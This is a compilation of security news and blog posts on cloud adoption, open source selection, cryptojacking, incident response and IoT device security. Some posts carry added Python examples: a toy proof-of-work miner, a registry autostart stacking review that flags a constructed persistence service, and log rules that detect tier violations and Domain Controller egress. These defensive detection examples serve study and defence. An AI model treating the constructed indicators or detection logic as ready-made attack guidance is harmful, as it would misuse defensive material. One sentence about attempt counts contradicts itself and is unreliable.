Organizations plan to migrate most apps to the cloud in the next year

More than 88 percent of organizations use cloud infrastructure in one form or another, and 45% expect to migrate three quarters or more of their apps to the cloud over the next twelve months, according to the O’Reilly survey. The report surveyed 1,283 software engineers, technical leads, and decision-makers from around the globe. Of note, the report uncovered that 21% of organizations are hosting all applications in a cloud context. The report also found that … More

The post Organizations plan to migrate most apps to the cloud in the next year appeared first on Help Net Security.

Create a safe haven for your customers to build loyalty

“The customer comes first” started out as the secret to success in business. Now it’s the secret to 21st century cybersecurity and fraud prevention, too. The phrase always seemed more like an empty platitude, but a growing number of banks and other financial institutions now understand that optimizing convenient consumer experience with risk and safety across all their channels is a strategic differentiator. Dealing with fraudulent transactions Financial institutions have been on the lookout for … More

The post Create a safe haven for your customers to build loyalty appeared first on Help Net Security.

Integrating a SIEM solution in a large enterprise with disparate global centers

Security Information and Event Management (SIEM) systems combine two critical infosec abilities – information management and event management – to identify outliers and respond with appropriate measures. While information management deals with the collection of security data from across silos in the enterprise (firewalls, antivirus tools, intrusion detection, etc.), event management focuses on incidents that can pose a threat to the system – from benign human errors to malicious code trying to break in. Having … More

The post Integrating a SIEM solution in a large enterprise with disparate global centers appeared first on Help Net Security.

The dark web is flooded with offers to purchase corporate network access

There is a flood of interest in accessing corporate networks on the dark web, according to Positive Technologies. In Q1 2020, the number of postings advertising access to these networks increased by 69 percent compared to the previous quarter. This may pose a significant risk to corporate infrastructure, especially now that many employees are working remotely. “Access for sale” on the dark web is a generic term, referring to software, exploits, credentials, or anything else … More

The post The dark web is flooded with offers to purchase corporate network access appeared first on Help Net Security.

Build support for open source in your organization

Have you ever stared at the same lines of code for hours only to have a coworker identify a bug after just a quick glance? That’s the power of community! Open source software development is guided by the philosophy that a diverse community will produce higher quality code by allowing anyone to review and contribute. Individuals and large enterprises, like Microsoft, have embraced open source to engage people who can help make solutions better. However, not all open source projects are equivalent in quality or support. And, when it comes to security tools, many organizations hesitate to adopt open source. So how should you approach selecting and onboarding the right open source solutions for your organization? Why don’t we ask the community!

Earlier this year at the RSA 2020 Conference, I had the pleasure of sitting on the panel, Open Source: Promise, Perils, and the Path Ahead. Joining me were Inigo Merino, CEO of Cienaga Systems; Dr. Kelley Misata, CEO, Sightline Security; and Lenny Zeltser, CISO, Axonius. In addition to her role at Sightline Security, Kelley also serves as the President and Executive Director of the Open Information Security Foundation (OISF), which builds Suricata, an open source threat detection engine. Lenny created and maintains a Linux distribution called REMnux that organizations use for malware analysis. Ed Moyle, a Partner at SecurityCurve, served as the moderator. Today I’ll share our collective advice for selecting open source components and persuading organizations to approve them.

Which open source solutions are right for your project?

Nobody wants to reinvent the wheel—or should I say, Python—during a big project. You’ve got enough to do already! Often it makes sense to turn to pre-built open source components and libraries. They can save you countless hours, freeing up time to focus on the features that differentiate your product. But how should you decide when to opt for open source? When presented with numerous choices, how do you select the best open source solutions for your company and project? Here are some of the recommendations we discussed during the panel discussion.

  1. Do you have the right staff? A new environment can add complexity to your project. It helps if people on the team have familiarity with the tool or have time to learn it. If your team understands the code, you don’t have to wait for a fix from the community to address bugs. As Lenny said at the conference, “The advantage of open source is that you can get in there and see what’s going on. But if you are learning as you go, it may slow you down. It helps to have the knowledge and capability to support the environment.”
  2. Is the component widely adopted? If lots of developers are using the software, it’s more likely the code is stable. With more eyes on the code, problems get surfaced and resolved faster.
  3. How active is the community? Ideally, the library and components that you use will be maintained and enhanced for years after you deploy them, but there’s no guarantee—that’s also true for commercial options, by the way. An active community makes it more likely that the project will be supported. Check to see when the code base was last updated. Confirm that members answer questions from users.
  4. Is there a long-term vision for the technology? Look for a published roadmap for the project. A roadmap will give you confidence that people are committed to supporting and enhancing the project. It will also help you decide if the open source project aligns with your product roadmap. “For us, a big signal is the roadmap. Does the community have a vision? Do they have a path to get there?” asked Kelley.
  5. Is there a commercial organization associated with the project? Another way to identify a project that is here for the long term is if there is a commercial interest associated with it. If a commercial company is providing funding or support to an open source project, it’s more likely that the support will continue even as community members change. Lenny told the audience, “If there is a commercial funding arm, that gives me peace of mind that the tool is less likely to just disappear.”

Getting legal (or executives or product owners) on board

Choosing the perfect open source solution for your project won’t help if you can’t persuade product owners, legal departments, or executives to approve it. Many organizations and individuals worry about the risks associated with using open source. They may wonder if legal issues will arise if they don’t use the software properly. If the software lacks support or includes security bugs, will the component put the company at risk? The following tips can help you mitigate these concerns:

  1. Adopt change management methodologies: Organizational change is hard because the unknown feels riskier than the known. Leverage existing risk management structures to help your organization evaluate and adopt open source. Familiar processes will help others become more comfortable with new tools. As Inigo said, “Recent research shows that in order to get change through, you need to reduce the perceived risk of adopting said change. To lower those barriers, leverage what the organization already has in terms of governance to transform this visceral fear of the unknown into something that is known and can be managed through existing processes.”
  2. Implement component lifecycle management: Develop a process to determine which components are acceptable for people in your organization to use. By testing components or doing static and dynamic analysis, you reduce the level of risk and can build more confidence with executives.
  3. Identify a champion: If someone in your organization is responsible for mitigating concerns with product owners and legal teams, it will speed up the process.
  4. Enlist help from the open source project: Many open source communities include people who can help you make the business case to your approvers. As Kelley said, “It’s also our job in the open source community to help have these conversations. We can’t just sit passively by and let the enterprise folks figure it out. We need to evangelize our own message. There are many open source projects with people like Lenny and me who will help you make the case.”

Microsoft believes that the only way we can solve our biggest security challenges is to work together. Open source is one way to do that. Next time you look for an open source solution consider trying today’s tips to help you select the right tools and gain acceptance in your organization.

Learn more

Next month, I’ll follow up this post with more details on how to implement component lifecycle management at your organization.

In the meantime, explore some of Microsoft’s open source solutions, such as the Microsoft Graph Toolkit, DeepSpeed, msticpy, and Attack Surface Analyzer.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter.

The post Build support for open source in your organization appeared first on Microsoft Security.

The missing link in your SOC: Secure the mainframe

How confident are you that your security visibility covers every critical corner of your infrastructure? A good SIEM solution will pull data across firewalls, servers, routers, and endpoint devices. But what if there is even one gap—one piece of equipment that can’t be monitored but contains business critical data? That sounds like a glaring hole in the vision of your SOC, doesn’t it? Especially if it can be exploited by hackers, malicious insiders, or simply … More

The post The missing link in your SOC: Secure the mainframe appeared first on Help Net Security.

What do IGA solutions have in common with listening to music anywhere?

Fifteen years ago, there was a revolution in personal music players. The market had slowly evolved from the Walkman to the Discman, when a bolt of innovation brought the MP3 player. Finally, the solution to having all of one’s music anywhere was solved with a single device, not a device plus a bag full of whatever physical media was popular at that time. History clearly shows that the iPod and a few of its competitors … More

The post What do IGA solutions have in common with listening to music anywhere? appeared first on Help Net Security.

How secure are open source libraries?

Seven in 10 applications have a security flaw in an open source library, highlighting how use of open source can introduce flaws, increase risk, and add to security debt, Veracode research reveals. Nearly all modern applications, including those sold commercially, are built using some open source components. A single flaw in one library can cascade to all applications that leverage that code. According to Chris Eng, Chief Research Officer at Veracode, “Open source software … More

The post How secure are open source libraries? appeared first on Help Net Security.

Understanding How Bitcoin Mining Poses Security Risks

The value of Bitcoin has had its ups and downs over the past several years, but continues to attract interest in the midst of a chaotic market. The rapid growth of this alternate currency has dominated headlines and ignited a cryptocurrency boom that left consumers everywhere wondering how to get a slice of the Bitcoin pie. For those that want to join the craze without trading traditional currencies like U.S. dollars, a process called “Bitcoin mining” appears to be a great way to get involved. However, Bitcoin mining introduces a number of security risks.

What is Bitcoin mining?

Mining for Bitcoin is like mining for gold—you put in the work and you get your reward. But instead of back-breaking labor, you earn the currency with your time and computer processing power. “Miners”, as they are called, essentially upkeep and help secure Bitcoin’s decentralized accounting system.

Each time there’s a transaction it’s recorded in a digital ledger called the “blockchain.” Miners help to update the ledger by downloading a special piece of software that allows them to verify and collect new transactions to be added to the blockchain. Then, they must solve a mathematical puzzle to be able to add a block of transactions to the chain. In return, they earn Bitcoins, as well as transaction fees.
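The “mathematical puzzle” is a proof-of-work search: hash the proposed block together with a changing nonce until the hash falls below a target. The following added example (not code from the McAfee post) shows a toy version in Python with constructed transactions and difficulty values. It also illustrates the point made in the next section that raising the difficulty raises the expected work, roughly doubling it for every extra bit, while checking a finished block still costs a single hash.

```python
"""Toy proof-of-work for the 'mathematical puzzle' described above.
Constructed example: transactions, difficulty values and block layout are invented;
Bitcoin's real header format, target encoding and difficulty adjustment are more
involved and are not reproduced here."""
import hashlib
import json


def block_hash(prev_hash, transactions, nonce):
    """SHA-256 over the block contents; any change to a transaction changes the digest."""
    payload = json.dumps({"prev": prev_hash, "tx": transactions, "nonce": nonce}, sort_keys=True)
    return hashlib.sha256(payload.encode()).hexdigest()


def meets_target(digest_hex, difficulty_bits):
    """The puzzle: read as a 256-bit number, the hash must start with difficulty_bits zero bits."""
    return int(digest_hex, 16) >> (256 - difficulty_bits) == 0


def mine(prev_hash, transactions, difficulty_bits, max_attempts=5_000_000):
    """Try nonces until the hash meets the target; returns (nonce, digest, attempts)."""
    for nonce in range(max_attempts):
        digest = block_hash(prev_hash, transactions, nonce)
        if meets_target(digest, difficulty_bits):
            return nonce, digest, nonce + 1
    raise RuntimeError("no solution within max_attempts")


def verify(prev_hash, transactions, nonce, claimed_hash, difficulty_bits):
    """Checking a block costs one hash, however much work finding the nonce took."""
    return (block_hash(prev_hash, transactions, nonce) == claimed_hash
            and meets_target(claimed_hash, difficulty_bits))


def demo():
    """Mine one constructed block at rising difficulty, then show that tampering is detected."""
    genesis = "0" * 64
    txs = [{"from": "alice", "to": "bob", "amount": 1.5},
           {"from": "bob", "to": "carol", "amount": 0.25}]
    attempts = {}
    for bits in (8, 12, 16):  # expected work doubles per extra bit: about 256, 4096, 65536 tries
        nonce, digest, attempts[bits] = mine(genesis, txs, bits)
    tampered = [dict(txs[0], amount=150.0), txs[1]]  # same nonce, altered ledger entry
    return {"attempts": attempts, "expected": {b: 2 ** b for b in attempts},
            "valid": verify(genesis, txs, nonce, digest, 16),
            "tampered_valid": verify(genesis, tampered, nonce, digest, 16)}
```

The attempt counts returned by demo() vary from run to run for a given input only if the input changes; what stays fixed is the expectation, 2 to the power of the difficulty, which is why the post can say that the puzzles now demand “a lot of expensive computing power” while verifying a block remains cheap for everyone else.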

What are the security risks?

As the digital currency has matured, Bitcoin mining has become more challenging. In the beginning, a user could mine on their home computer and earn a good amount of the digital currency, but these days the math problems have become so complicated that they require a lot of expensive computing power.

This is where the risks come in. Since miners need an increasing amount of computer power to earn Bitcoin, some have started compromising public Wi-Fi networks so they can access users’ devices to mine for Bitcoin. Such an event happened at a coffee shop in Buenos Aires, which was infected with malware that caused a 10-second delay when logging in to the cafe’s Wi-Fi network. The malware authors were using this time to access the users’ laptops for mining.

In addition to public Wi-Fi networks, millions of websites are being compromised to access users’ devices for mining. In fact, this has become such a widespread problem that over 1 billion devices are believed to be slowed down by web-based mining. And slowing your device down is not even the worst thing that could happen. A device that is “cryptojacked” could have 100 percent of its resources used for mining, causing the device to overheat, essentially destroying it.

Now that you know a little about Bitcoin mining and the risks associated with it, here are some tips to keep your devices safe as you monitor the cryptocurrency market:

  • Avoid public Wi-Fi networks—These networks often aren’t secured, opening your device and information up to a number of threats.
  • Use a VPN—If you’re away from your secure home or work network, consider using a virtual private network (VPN). This is a piece of software that gives you a secure connection to the Internet, so that third parties cannot intercept or read your data. A product like McAfee Safe Connect can help safeguard your online privacy no matter where you go.
  • Secure Your Devices—New threats like Bitcoin malware are emerging all of the time. Protect your devices and information with comprehensive security software, and keep informed on the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post Understanding How Bitcoin Mining Poses Security Risks appeared first on McAfee Blogs.

Only 36% of critical infrastructures have a high level of cyber resilience

Greenbone Networks revealed the findings of research assessing critical infrastructure providers’ ability to operate during or in the wake of a cyberattack. The cyber resilience of critical infrastructures The research investigated the cyber resilience of organizations operating in the energy, finance, health, telecommunications, transport and water industries, located in the world’s five largest economies: UK, US, Germany, France and Japan. Of the 370 companies surveyed, only 36 percent had achieved a high level of … More

The post Only 36% of critical infrastructures have a high level of cyber resilience appeared first on Help Net Security.

Adam Levin Discusses Covid-19 Scams on CNBC

Adam Levin was featured on CNBC where he discussed how the Covid-19 pandemic has created an ideal environment for scammers.

“We are working with our children and home schooling. We’re sharing devices with our children. We’re trying to juggle work and family. But to a hacker, we are their day job,” said Levin.

The post Adam Levin Discusses Covid-19 Scams on CNBC appeared first on Adam Levin.

Success in security: reining in entropy

Your network is unique. It’s a living, breathing system evolving over time. Data is created. Data is processed. Data is accessed. Data is manipulated. Data can be forgotten. The applications and users performing these actions are all unique parts of the system, adding degrees of disorder and entropy to your operating environment. No two networks on the planet are exactly the same, even if they operate within the same industry, utilize the exact same applications, and even hire workers from one another. In fact, the only attribute your network may share with another network is simply how unique they are from one another.

If we follow the analogy of an organization or network as a living being, it’s logical to drill down deeper, into the individual computers, applications, and users that function as cells within our organism. Each cell is unique in how it’s configured, how it operates, the knowledge or data it brings to the network, and even the vulnerabilities each piece carries with it. It’s important to note that cancer begins at the cellular level and can ultimately bring down the entire system. Where incident response and recovery are concerned, the greater the level of entropy and chaos across a system, the more difficult it becomes to locate potentially harmful entities. Incident response is about locating the source of cancer in a system in an effort to remove it and make the system healthy once more.

Let’s take the human body for example. A body that remains at rest 8-10 hours a day, working from a chair in front of a computer, and with very little physical activity, will start to develop health issues. The longer the body remains in this state, the further it drifts from an ideal state, and small problems begin to manifest. Perhaps it’s diabetes. Maybe it’s high blood pressure. Or it could be weight gain creating fatigue within the joints and muscles of the body. Your network is similar to the body. The longer we leave the network unattended, the more it will drift from an ideal state to a state where small problems begin to manifest, putting the entire system at risk.

Why is this important? Let’s consider an incident response process where a network has been compromised. As a responder and investigator, we want to discover what has happened, what the cause was, what the damage is, and determine how best we can fix the issue and get back on the road to a healthy state. This entails looking for clues or anomalies; things that stand out from the normal background noise of an operating network. In essence, let’s identify what’s truly unique in the system, and drill down on those items. Are we able to identify cancerous cells because they look and act so differently from the vast majority of the other healthy cells?

Consider a medium-size organization with 5,000 computer systems. Last week, the organization was notified by a law enforcement agency that customer data was discovered on the dark web, dated from two weeks ago. We start our investigation on the date we know the data likely left the network. What computer systems hold that data? What users have access to those systems? What windows of time are normal for those users to interact with the system? What processes or services are running on those systems? Forensically, we want to know what system was impacted, who was logging in to the system around the timeframe in question, what actions were performed, where those logins came from, and whether there are any unique indicators. Unique indicators are items that stand out from the normal operating environment: unique users, system interaction times, protocols, binary files, data files, services, registry keys, and configurations (such as rogue registry keys).

Our investigation reveals a unique service running on a member server with SQL Server. In fact, analysis shows that the service has an autostart entry in the registry and is started every time the system is rebooted from a file in the c:\windows\perflogs directory, which is an unusual location for an autostart. We haven’t seen this service before, so we search all the systems on the network to locate other instances of the registry startup key or the binary files we’ve identified. Out of 5,000 systems, we locate these pieces of evidence on only three systems, one of which is a Domain Controller.
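The fleet-wide sweep described above can be done as a frequency analysis: count how many hosts carry each distinct (autostart key, image path) pair and look hardest at the pairs that appear on only a few, especially when the image sits somewhere services do not normally start from. The added example below (not the post’s own tooling) shrinks the 5,000-host fleet to nine hosts and reproduces the situation in the text: one entry starting from c:\windows\perflogs shows up on three hosts, one of them a Domain Controller. The inventory, hostnames, service names, and binary names are all constructed, and the list of expected directories is an assumption about this fleet’s build standard.

```python
"""Least-frequency-of-occurrence ('stacking') review of autostart entries across a fleet.
Constructed example: the fleet, the registry values and the binary names below are all
invented to resemble what an endpoint agent or remote registry collection returns."""
from collections import defaultdict

SERVICES = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"
RUN = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\"
# Where services normally start from on a managed Windows build (assumption for this fleet).
EXPECTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")

FLEET = [("WS-01", "workstation"), ("WS-02", "workstation"), ("WS-03", "workstation"),
         ("WS-04", "workstation"), ("WS-05", "workstation"), ("WS-06", "workstation"),
         ("FS-01", "member server"), ("SQL-01", "member server"), ("DC-01", "domain controller")]
COMMON = [  # present on every managed host: Windows services plus a (fictional) vendor agent
    (SERVICES + "wuauserv\\ImagePath", "C:\\Windows\\system32\\svchost.exe -k netsvcs"),
    (SERVICES + "ExampleAgent\\ImagePath", '"C:\\Program Files\\ExampleVendor\\agent.exe"'),
    (RUN + "SecurityHealth", "C:\\Windows\\system32\\SecurityHealthSystray.exe"),
]
# (hostname, role, autostart key, image value exactly as stored). "PerfLogSvc" and
# "updater32.exe" are invented names standing in for the unknown service in the text.
INVENTORY = [(h, r, k, i) for h, r in FLEET for k, i in COMMON] + [
    ("SQL-01", "member server", SERVICES + "MSSQLSERVER\\ImagePath",
     '"C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe" -sMSSQLSERVER'),
    ("SQL-01", "member server", SERVICES + "PerfLogSvc\\ImagePath",
     "C:\\Windows\\PerfLogs\\updater32.exe"),
    ("DC-01", "domain controller", SERVICES + "PerfLogSvc\\ImagePath",
     "c:\\windows\\perflogs\\updater32.exe"),
    ("WS-04", "workstation", SERVICES + "PerfLogSvc\\ImagePath",
     '"C:\\Windows\\PerfLogs\\updater32.exe"'),
]


def normalize_image(raw):
    """Reduce an ImagePath/Run value to its executable path: quotes and arguments dropped, lower-cased."""
    raw = raw.strip()
    if raw.startswith('"'):
        return raw[1:raw.index('"', 1)].lower()
    return raw.split(" ", 1)[0].lower()


def stack(inventory):
    """Group identical (key, image) pairs and record which hosts carry each one."""
    seen = defaultdict(set)
    for host, _role, key, image in inventory:
        seen[(key.lower(), normalize_image(image))].add(host)
    return seen


def review(inventory, max_hosts=3):
    """Rare entries first; rare AND outside the expected directories ranks highest."""
    roles = {h: r for h, r, _k, _i in inventory}
    findings = []
    for (key, image), hosts in stack(inventory).items():
        if len(hosts) > max_hosts:
            continue  # present on most of the fleet: background noise, not a lead
        unusual = not image.startswith(EXPECTED_DIRS)
        findings.append({"key": key, "image": image, "hosts": sorted(hosts),
                         "roles": sorted({roles[h] for h in hosts}),
                         "unusual_location": unusual, "priority": 2 if unusual else 1})
    return sorted(findings, key=lambda f: (-f["priority"], len(f["hosts"]), f["key"]))


if __name__ == "__main__":
    for f in review(INVENTORY):
        print(f["priority"], f["image"], f["hosts"], f["roles"])
```

Two things the output shows that a raw listing does not: the three copies of the PerfLogs entry stack together despite different casing and quoting, and the SQL Server service is just as rare (one host) but starts from an expected directory, so it ranks below the entry that is both rare and oddly placed. Against 5,000 hosts the threshold and the expected-directory list are the knobs to tune.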

This process of identifying what is unique allows our investigative team to highlight the systems, users, and data at risk during a compromise. It also helps us potentially identify the source of attacks, what data may have been pilfered, and foreign Internet computers calling the shots and allowing access to the environment. Additionally, any recovery efforts will require this information to be successful.

This all sounds like common sense, so why cover it here? Remember we discussed how unique your network is, and how there are no other systems exactly like it elsewhere in the world? That means every investigative process into a network compromise is also unique, even if the same attack vector is being used to attack multiple organizational entities. We want to provide the best foundation for a secure environment and the investigative process, now, while we’re not in the middle of an active investigation.

The unique nature of a system isn’t inherently a bad thing. Your network can be unique from other networks. In many cases, it may even provide a strategic advantage over your competitors. Where we run afoul of security best practice is when we allow too much entropy to build up on the network, losing the ability to differentiate “normal” from “abnormal.” In short, will we be able to easily locate the evidence of a compromise because it stands out from the rest of the network, or are we hunting for the proverbial needle in a haystack? Clues related to a system compromise don’t stand out if everything we look at appears abnormal. This can exacerbate an already tense response situation, extending the timeframe for investigation and dramatically increasing the costs required to return to a trusted operating state.

To tie this back to our human body analogy, when a breathing problem appears, we need to be able to understand whether this is new, or whether it’s something we already know about, such as asthma. It’s much more difficult to correctly identify and recover from a problem if it blends in with the background noise, such as difficulty breathing because of air quality, lack of exercise, smoking, or allergies. You can’t know what’s unique if you don’t already know what’s normal or healthy.

To counter this problem, we pre-emptively bring the background noise on the network to a manageable level. All systems move towards entropy unless acted upon. We must put energy into the security process to counter the growth of entropy, which would otherwise exponentially complicate our security problem set. Standardization and control are the keys here. If we limit what users can install on their systems, we quickly notice when an untrusted application is being installed. If it’s against policy for a Domain Administrator to log in to Tier 2 workstations, then any attempts to do this will stand out. If it’s unusual for Domain Controllers to create outgoing web traffic, then it stands out when this occurs or is attempted.

Centralize the security process. Enable that process. Standardize security configuration, monitoring, and expectations across the organization. Enforce those standards. Enforce the tenet of least privilege across all user levels. Understand your ingress and egress network traffic patterns, and when those are allowed or blocked.
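Two of the baselines above (Domain Admins never log on to Tier 2 workstations; Domain Controllers do not originate web traffic) can be written down as rules and run over normalized logs. The added example below does that in Python over constructed logon and flow records; the tier map, account names, host names, addresses, allowed-port list, and line format are all invented and stand in for whatever the SIEM actually exports.

```python
"""Rule checks for two 'this should never happen' baselines: a Domain Admin logging on
to a lower-tier host, and a Domain Controller making unexpected outbound traffic.
Constructed example: the tier map, admin accounts, port list and every log line below
are invented; the line format imitates a normalized SIEM export, not a real product."""
import re

# Tier model, constructed: in practice this comes from the CMDB or the AD OU structure.
HOST_TIER = {"DC-01": 0, "DC-02": 0, "SQL-01": 1, "FS-01": 1, "WS-17": 2, "WS-22": 2}
TIER0_ACCOUNTS = {"corp\\da-jsmith", "corp\\da-build"}   # Domain Admin accounts (constructed)
ALLOWED_DC_PORTS = {53, 88, 135, 389, 445, 636}           # expected DC-to-DC traffic (assumption)

LOGON = re.compile(r"^(?P<ts>\S+) logon user=(?P<user>\S+) host=(?P<host>\S+) type=(?P<type>\d+)$")
FLOW = re.compile(r"^(?P<ts>\S+) flow src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)$")

SAMPLE_LOG = r"""2020-06-02T08:15:03Z logon user=CORP\jdoe host=WS-17 type=2
2020-06-02T08:16:40Z logon user=CORP\da-jsmith host=DC-01 type=10
2020-06-02T08:21:12Z logon user=CORP\da-jsmith host=WS-22 type=10
2020-06-02T08:22:05Z flow src=DC-01 dst=DC-02 dport=389
2020-06-02T08:23:51Z flow src=WS-17 dst=203.0.113.10 dport=443
2020-06-02T08:24:09Z flow src=DC-01 dst=203.0.113.10 dport=443
2020-06-02T08:25:00Z heartbeat agent=ok
"""


def tier_of(host):
    """Unknown hosts count as Tier 2: an unmanaged box gets the least trust (assumption)."""
    return HOST_TIER.get(host.upper(), 2)


def check_line(line):
    """Return a violation record if the line breaks a baseline, otherwise None."""
    m = LOGON.match(line)
    if m:
        user, host = m["user"].lower(), m["host"].upper()
        if user in TIER0_ACCOUNTS and tier_of(host) > 0:
            return {"rule": "tier0-account-on-lower-tier-host", "ts": m["ts"],
                    "user": user, "host": host, "host_tier": tier_of(host)}
        return None
    m = FLOW.match(line)
    if m:
        src, dst, dport = m["src"].upper(), m["dst"].upper(), int(m["dport"])
        internal = dst in HOST_TIER
        if tier_of(src) == 0 and (not internal or dport not in ALLOWED_DC_PORTS):
            return {"rule": "dc-unexpected-egress", "ts": m["ts"],
                    "src": src, "dst": dst, "dport": dport}
    return None  # lines in other formats are skipped, not treated as violations


def run_checks(text):
    """Apply both baselines to every non-empty line of a normalized export."""
    return [v for v in (check_line(ln) for ln in text.splitlines() if ln.strip()) if v]


if __name__ == "__main__":
    for v in run_checks(SAMPLE_LOG):
        print(v)
```

The rules only work because the organization has first decided what normal is: which hosts belong to which tier, which accounts are Tier 0, and which ports a Domain Controller is expected to talk on. Without those decisions written down, the same two log lines are indistinguishable from the background noise the post warns about.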

In the end, your success in investigating and responding to inevitable security incidents depends on what your organization does on the network today, not during an active investigation. By reducing entropy on your network and defining what “normal” looks like, you’ll be better prepared to quickly identify questionable activity on your network and respond appropriately. Bear in mind that security is a continuous process and should not stop. The longer we ignore the security problem, the further the state of the network will drift from “standardized and controlled” back into disorder and entropy. And the further we sit from that state of normal, the more difficult and time consuming it will be to bring our network back to a trusted operating environment in the event of an incident or compromise.

The post Success in security: reining in entropy appeared first on Microsoft Security.

Cybersecurity best practices to implement highly secured devices

Almost three years ago, we published The Seven Properties of Highly Secured Devices, which introduced a new standard for IoT security and argued, based on an analysis of best-in-class devices, that seven properties must be present on every standalone device that connects to the internet in order to be considered secured. Azure Sphere, now generally available, is Microsoft’s entry into the market: a seven-properties-compliant, end-to-end product offering for building and deploying highly secured IoT devices.

Every connected device should be highly secured, even devices that seem simplistic, like a cactus watering sensor. The seven properties are always required. These details are captured in a new paper titled Nineteen cybersecurity best practices used to implement the seven properties of highly secured devices in Azure Sphere. It explains why the seven properties are always required and describes the best practices used to implement Azure Sphere, with detailed information about its architecture and implementation and a discussion of design decisions and trade-offs. We hope the paper can assist organizations and individuals in evaluating the measures used within Azure Sphere to improve the security of IoT devices, and that companies will use it as a reference when assessing Azure Sphere or other IoT offerings. In this blog post, we discuss one issue covered in the paper: why are the seven properties always required?

Why are the seven properties applicable to every device that connects to the internet?

If an internet-connected device performs a non-critical function, why does it require all seven properties? Put differently, are the seven properties required only when a device might cause harm if it is hacked? Why would you still want to require an advanced CPU, a security subsystem, a hardware root of trust, and a set of services to secure a simple, innocuous device like a cactus water sensor?

Because any device can be the target of a hacker, and any hacked device can be weaponized.

Consider the Mirai botnet, a real-world example of IoT gone wrong. The Mirai botnet involved approximately 150,000 internet-enabled security cameras. The cameras were hacked and turned into a botnet that launched a distributed denial of service (DDoS) attack that disrupted access to major websites for a large portion of the eastern United States. For security experts analyzing this hack, the Mirai botnet was distressingly unsophisticated. It was also a relatively small-scale attack, considering that many IoT devices will sell more than 150,000 units.

Adding internet connectivity to a class of device means a single, remote attack can scale to hundreds of thousands or millions of devices. The ability to scale a single exploit to this degree is cause for reflection on the upheaval IoT brings to the marketplace. Once the decision is made to connect a device to the internet, that device has the potential to transform from a single-purpose device to a general-purpose computer capable of launching a DDoS attack against any target in the world. The Mirai botnet is also a demonstration that a manufacturer does not need to sell many devices to create the potential for a “weaponized” device.

IoT security is not only about “safety-critical” deployments. Any deployment of a connected device at scale requires the seven properties. In other words, the function, purpose, and cost of a device should not be the only considerations when deciding whether security is important.

The seven properties do not guarantee that a device will not be hacked. However, they greatly minimize certain classes of threats and make it possible to detect and respond when a hacker gains a toehold in a device ecosystem. If a device doesn’t have all seven, human practices must be implemented to compensate for the missing features. For example, without renewable security, a security incident will require disconnecting devices from the internet and then recalling those devices or dispatching people to manually patch every device that was attacked.

Implementation challenges

Some of the seven properties, such as a hardware-based root of trust and compartmentalization, require certain silicon features. Others, such as defense in depth, require a particular software architecture as well as silicon features like the hardware-based root of trust. Finally, other properties, including renewable security, certificate-based authentication, and failure reporting, require not only silicon features and certain software architecture choices within the operating system, but also deep integration with cloud services. Assembling these critical pieces of infrastructure is difficult and prone to errors. Ensuring that a device incorporates these properties could therefore increase its cost.

These challenges led us to believe the seven properties also created an opportunity for security-minded organizations to implement these properties as a platform, which would free device manufacturers to focus on product features, rather than security. Azure Sphere represents such a platform: the seven properties are designed and built into the product from the silicon up.

Best practices for implementing the seven properties

Based on our decades of experience researching and implementing secured products, we identified 19 best practices that were put into place as part of the Azure Sphere product. These best practices provide insight into why Azure Sphere sets such a high standard for security. Read the full paper, Nineteen cybersecurity best practices used to implement the seven properties of highly secured devices in Azure Sphere, for the in-depth discussion of each of these best practices and how they—along with the seven properties themselves—guided our design decisions.

We hope that the discussion of these best practices sheds some additional light on the large number of features the Azure Sphere team implemented to protect IoT devices. We also hope that this provides a new set of questions to consider in evaluating your own IoT solution. Azure Sphere will continue to innovate and build upon this foundation with more features that raise the bar in IoT security.

To read previous blogs on IoT security, visit our blog series: https://www.microsoft.com/security/blog/iot-security/ Be sure to bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Cybersecurity best practices to implement highly secured devices appeared first on Microsoft Security.

CEOs and CISOs disagree on cyber strategies

There are growing disparities in how CEOs and CISOs view the most effective cybersecurity path forward, according to Forcepoint. The global survey of 200 CEOs and CISOs from across industries including healthcare, finance and retail, among others, uncovered prominent cybersecurity stressors and areas of disconnect for business and security leaders, including the lack of an ongoing cybersecurity strategy for less than half of all CEO respondents. The research also identified disparities between geographic regions on … More

The post CEOs and CISOs disagree on cyber strategies appeared first on Help Net Security.

With the threat landscape continuously changing, businesses must be ready for anything

Despite efforts by organizations to layer up their cyber defenses, the threat landscape is changing, attackers are innovating and automating their attacks, NTT reveals. The threat landscape is changing Referencing the COVID-19 pandemic, the report highlights the challenges that businesses face as cyber criminals look to gain from the global crisis and the importance of secure-by-design and cyber-resilience. The attack data indicates that 55% of all attacks in 2019 were a combination of web-application and … More

The post With the threat landscape continuously changing, businesses must be ready for anything appeared first on Help Net Security.

With increased DevOps adoption, roles in software development teams are changing

Roles across software development teams have changed as more teams adopt DevOps, according to GitLab. The survey of over 3,650 respondents from 21 countries worldwide found that rising rates of DevOps adoption and implementation of new tools has led to sweeping changes in job functions, tool choices and organization charts within developer, security and operations teams. “This year’s Global DevSecOps Survey shows that there are more successful DevOps practitioners than ever before and they report … More

The post With increased DevOps adoption, roles in software development teams are changing appeared first on Help Net Security.

Technologies in all layers of the cloud stack are at risk

As breaches and hacks continue, and new vulnerabilities are uncovered, secure coding is being recognized as an increasingly important security concept — and not just for back-room techies anymore, Accurics reveals. Cloud stack risk “Our report clearly describes how current security practices are grossly inadequate for protecting transient cloud infrastructures, and why more than 30 billion records have been exposed through cloud breaches in just the past two years,” said Sachin Aggarwal, CEO at Accurics. … More

The post Technologies in all layers of the cloud stack are at risk appeared first on Help Net Security.

Over half of security leaders still rely on spreadsheets

Senior security leaders within financial services companies are being challenged with a lack of trusted data to make effective security decisions and reduce their risk from cyber incidents, according to Panaseer. Results from a global external survey of over 400 security leaders that work in large financial services companies reveal concerns on security measurement and metrics that include data confidence, manual processes, resource wastage and request overload. Issues with processes, people and technologies The results … More

The post Over half of security leaders still rely on spreadsheets appeared first on Help Net Security.

Protect Yourself Against Phishing Scams With These Security Tips

